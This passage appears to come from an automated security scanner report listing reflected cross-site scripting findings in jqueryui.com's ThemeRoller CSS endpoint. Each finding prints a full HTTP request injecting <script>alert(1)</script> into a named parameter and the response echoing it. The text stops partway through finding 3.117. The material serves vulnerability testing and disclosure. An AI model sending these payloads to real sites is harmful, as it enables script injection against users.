GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65f1d3b<script>alert(1)</script>6b6c02a5e90&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:02 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65f1d3b<script>alert(1)</script>6b6c02a5e90&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,s
...[SNIP]...

3.111. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the HTML document as plain text between tags. The payload b0ecb<script>alert(1)</script>d03ff2877d9 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75b0ecb<script>alert(1)</script>d03ff2877d9&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75b0ecb<script>alert(1)</script>d03ff2877d9&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.112. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the HTML document as plain text between tags. The payload 12382<script>alert(1)</script>24ba7d2a748 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7512382<script>alert(1)</script>24ba7d2a748&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=7512382<script>alert(1)</script>24ba7d2a748&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.113. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the HTML document as plain text between tags. The payload bb7fe<script>alert(1)</script>300123efbf3 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75bb7fe<script>alert(1)</script>300123efbf3&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75bb7fe<script>alert(1)</script>300123efbf3&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.114. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the HTML document as plain text between tags. The payload 27c2a<script>alert(1)</script>a969c6253b1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7527c2a<script>alert(1)</script>a969c6253b1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7527c2a<script>alert(1)</script>a969c6253b1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-se
...[SNIP]...

3.115. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureActive request parameter is copied into the HTML document as plain text between tags. The payload 33564<script>alert(1)</script>9998b38772e was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png33564<script>alert(1)</script>9998b38772e&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:02 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17454


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png33564<script>alert(1)</script>9998b38772e&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-f
...[SNIP]...

3.116. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureContent request parameter is copied into the HTML document as plain text between tags. The payload 73ee6<script>alert(1)</script>9215b897fdf was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png73ee6<script>alert(1)</script>9215b897fdf&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17314


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png73ee6<script>alert(1)</script>9215b897fdf&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.117. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgTextureDefault request parameter is copied into the HTML document as plain text between tags. The payload 6f8c3<script>alert(1)</script>e2f9b13ed0e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

